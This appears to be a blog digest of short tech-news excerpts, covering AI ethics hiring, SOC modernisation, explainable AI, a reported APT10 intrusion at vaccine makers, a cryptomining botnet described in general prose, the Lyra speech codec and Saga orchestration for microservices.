Looking For An AI Ethicist? Good Luck
Just like with the hunt for data scientists, the person in charge of driving the
AI ethics strategy at a company ideally will have a long list of qualifications.
According to Ammanath, who was a Datanami Person to Watch for 2020, an AI
ethicist generally should have the following skills and capabilities: An
understanding of AI tools and technology; An understanding of the business
and the industry and the specific AI ethical traps that exist in them; Good
communication skills and the ability to work across organizational
boundaries; And regulatory, legal, and policy knowledge. There are
additional skills that may be required, such as having experience with the
philosophical, psychological, or sociological aspects of ethics; knowing how to
structure a business and a team in an ethical manner; and even knowing how to
mitigate the environmental impact of using AI. “The point is that you need to
have a wide variety of skills,” Ammanath says. “It’s like finding that
unicorn…Trying to find that person with credible experience and knowledge in all
of these areas is practically impossible.” So where does that leave you? The
odds are, unless you’re working at a very large enterprise, you won’t be able to
find a person to fit this exact job description.
Building a Next-Generation SOC Starts With Holistic Operations
Today's reimagined SOCs bring together disparate teams to counteract intrusions,
providing everyone with a coordinated, holistic, real-time view. This tactic
empowers analysts to head things off, "shifting left" in the cyber kill chain to
identify the full scope of the attack while it's happening and quickly block it
as far upstream as possible (ideally using automated investigation and
response). We see this as the only way for SOCs to address new threats in time
to avert major business impacts. It's time to empower your SOC with multidomain,
central teams. It's more than tools differentiating a reactive SOC from an
agile, proactive, successful one. Modernizing security operations requires an
operational model that drives cross-technology integration to match the
attacker's modus operandi. Empowering your SOC to deploy speedy, effective
countermeasures means dangerous attackers will be slowed or deterred, reducing
damage to your business and saving valuable time and money. The proper template
for a modernized SOC team operates seamlessly across domains with an end-to-end
view. Consider your SOC's opposition: Sophisticated bad actors see the entire
picture, know where they're going and who they're engaging, and understand how
to exploit weaknesses.
Can we explain AI? An Introduction to Explainable Artificial Intelligence.
Why do we need to explain AI? This is a question that has no simple answer to
it. Suppose you take the example of my project that I mentioned initially. In
that case, the controller might want to understand our trust models. It is
hard to believe something we do not understand. We have a problem when we
cannot explain the decisions made by an algorithm. In assessing AI’s
decisions, it is crucial to assess the factors that led to that decision. We
will therefore be able to audit and challenge decisions or work to improve the
factors. This is where the importance of xAI, or explainable AI, comes in,
which addresses the need to be able to interpret a model of Machine Learning.
This is because it is typical for the formulation of problems addressed by ML
to be incomplete. Often, forecasting is not enough to address a problem. It is
essential to know more than just “what,” but also “why,” “how.” It is not
enough to know that a teacher has been poorly classified in one year; it is
also essential to know the reason for improvement. Although AI is one of the
most important and disruptive technologies of the century, it is subject to
bias. Good model accuracy can be a trap.
Why IT Should Have a Separate Training Budget
Large IT organizations can fund their own training departments, complete with
their own training directors. Often these individuals have experience in both
IT and education -- and they do a great job. But in many other cases, there is
no formal IT training function -- only an IT training budget. In these cases,
the CIO, project managers and other IT leadership must step in. They identify
the core skills that they need and the individuals whom they want to send to
these trainings -- and what the training will cost. This strategy of
collectively evaluating IT staff, with each manager coming forth with his or
her staff training needs, works -- but it’s far from flawless. The major
downside is that people who are not skilled in education or training might not
make the right training choices -- either in courses or in the people they
send. ... Hot projects and keeping systems running are IT priorities, not
training. So, if there is a hot project, or a major performance issue with an
existing system, training is quickly forgotten. The result is that training
that was budgeted gets deferred or isn't used at all. This makes for a very
tough fight for the CIO when the next budget review comes around. The CFO will
undoubtedly challenge the IT training budget, saying that the budget was
underused last year so should be re-funded at that lesser level.
Indian Vaccine Makers, Oxford Lab Reportedly Hacked
The Chinese state-backed hacking group APT10, also known as Stone Panda, has
in recent weeks targeted the IT systems of two Indian pharmaceutical makers
whose coronavirus vaccines are being used in the country's immunization
program, the Reuters news service reports, citing a report from Tokyo,
Japan-based cybersecurity firm Cyfirma. That company says that hackers
identified gaps and vulnerabilities in the IT infrastructure and supply chain
software of the pharmaceutical firm Bharat Biotech and the Serum Institute of
India, or SII, one of the largest vaccine makers globally, Reuters reports.
Cyfirma says the apparent motivation behind the hackers' efforts was an
attempt to exfiltrate intellectual property of the pharmaceutical firms,
according to Reuters. SII is making the AstraZeneca vaccine for many countries
and will soon start bulk-manufacturing Novavax shots, the news service
reports. Cyfirma, SII and Bhara Biotech did not immediately respond to
Information Security Media Group's requests for comment. ... Meanwhile, last
week, Forbes reported that U.K.-based Oxford University's Division of
Structural Biology – known as Strubi - had been hacked, with equipment used to
prepare biochemical samples targeted.
Rethinking the artificial intelligence race
The way that AI systems are developed naturally creates doubts about their
ability to function in untested environments, namely the requirement of large
amounts of data inputs, the necessity that they be nearly perfect, and the
effects of the preconceived notions of its creators. First, lack of, or
erroneous, data is one of the largest challenges, especially when relying on
machine learning techniques. To teach a computer to recognize a bird, it must
be fed thousands of pictures to “learn” a bird’s distinguishing features,
which naturally limits use in fields with few examples. Additionally, if even
a tiny portion of the data is incorrect (as little as 3%), the system may
develop incorrect assumptions or suffer drastic decreases in performance.
Finally, the system may also recreate assumptions and prejudices—racist,
sexist, elitist, or otherwise—from extant data that already contains inherent
biases, such as resume archives or police records. These could also be coded
in as programmers inadvertently impart their own cognitive biases into the
machine learning algorithms they design. This propensity for deep-seated
decision-making problems, which may only become evident well after
development, will prove problematic to those that want to rely heavily on AI,
especially concerning issues of national security.
How Leaders Can Help Their Teams Manage Stress in the New Year
Employees need to take vacations to reset and get their minds off of their
work, but modern work policies don’t encourage time off the way they should.
Plenty of companies offer generous or even unlimited amounts of vacation time,
but workers are reticent to indulge lest they fall behind. The easiest
solution to this issue is to simply mandate that workers take the time off
they need. To combat the high-stress levels endemic to companies in their
industry, game developer Supergiant Games instituted a policy stating that
workers must take a minimum of 20 days off annually while still allowing for
unlimited time away. A similar policy for your workplace will help employees
cool off right when they need to the most. ... Your workers will never be able
to achieve stress equilibrium if their boss can’t do it first. Being a great
business leader isn’t just about telling people what they need to do; it’s
about modeling those behaviors yourself. If you’re preaching stress reduction
to your team while clocking in 11 hours a day, no one is going to be able to
take your messaging seriously. Stress management starts with you, whether you
like it or not.
Google Introduces Low Bitrate Speech Codec For Smoother Communication
Lyra is a novel method for compressing and transmitting voice signals. For this,
the researchers applied traditional codec techniques and the latest machine
learning methods on models trained on vast amounts of data. Lyra extracts
features or distinctive speech attributes (list of numbers representing the
speech energy in different frequency bands, called log mel spectrograms) from
the input every 40ms and compresses before transmitting. At the receiving end, a
generative model converts the features to a speech signal. Lyra’s new and
improved ‘natural-sounding’ generative models maintain a low bitrate of codecs
to achieve high-quality codecs, generally on par with state-of-art waveform
codecs used in streaming platforms. However, one drawback of these generative
models is computational complexity. To overcome this, Lyra uses a cheaper
variation of WaveRNN, a recurrent generative model. Though it works at a lower
rate, it generates multiple parallel signals in different frequencies. These
signals are then combined to output a signal at the desired sample rate. Hence,
Lyra works on cloud servers and mid-range phones with a processing latency of
90ms.
Cryptomining Botnet Uses Bitcoin Wallet to Avoid Detection
The initial infection starts with the exploitation of remote code execution
vulnerabilities in Hadoop Yarn, Elasticsearch (CVE-2015-1427) and ThinkPHP
(CVE-2019-9082). The payload delivered causes the vulnerable machine to download
and execute a malicious shell script. "In older campaigns, the shell script
itself handled the key functions of infection. The stand-alone script disabled
security features, killed off competing infections, established persistence, and
in some cases, continued infection attempts across networks found within the
known host files," the report notes. But the newer instances of the shell script
are written with fewer lines of code and use binary payloads for handling more
system interactions, such as killing off competition, disabling security
features, modifying SSH keys, downloading malware and starting the miners.
Researchers note that the operators behind the campaign use cron jobs and
rootkits for persistence and updates to distribution, ensuring infected machines
will regularly check in and be reinfected with the latest version of the
malware. These methods rely on domains and static IP addresses written into
crontabs and configurations, and these domains and IP addresses routinely get
identified and seized, the researchers say.
Saga Orchestration for Microservices Using the Outbox Pattern
There are two general ways for implementing distributed Sagas—choreography and
orchestration. In the choreography approach, one participating service sends a
message to the next after it has executed its local transaction. With
orchestration, on the other hand, there’s one coordinating service that invokes
one participant after the other. Both approaches have their pros and cons.
Personally, I prefer the orchestration approach, as it defines one central place
that can be queried to obtain the current status of a particular Saga (the
orchestrator, or “Saga execution coordinator,” SEC for short). Since it avoids
point-to-point communication between participants, (other than the
orchestrator), it also allows for the addition of further intermediary steps
within the flow, without the need to adjust each participant. Before diving into
the implementation of such Saga flow, it’s worth spending some time to think
about the transactional semantics that Sagas provide. ... From a service
consumer point of view—e.g., a user placing a purchase order with the order
service—the system is eventually consistent; i.e., it will take some time until
the purchase order is in its correct state, as per the logic of the different
participating services.
Quote for the day:
"In any leadership position, the most
important aspect of your job will be getting your team to work together." --
Dale Brown
No comments:
Post a Comment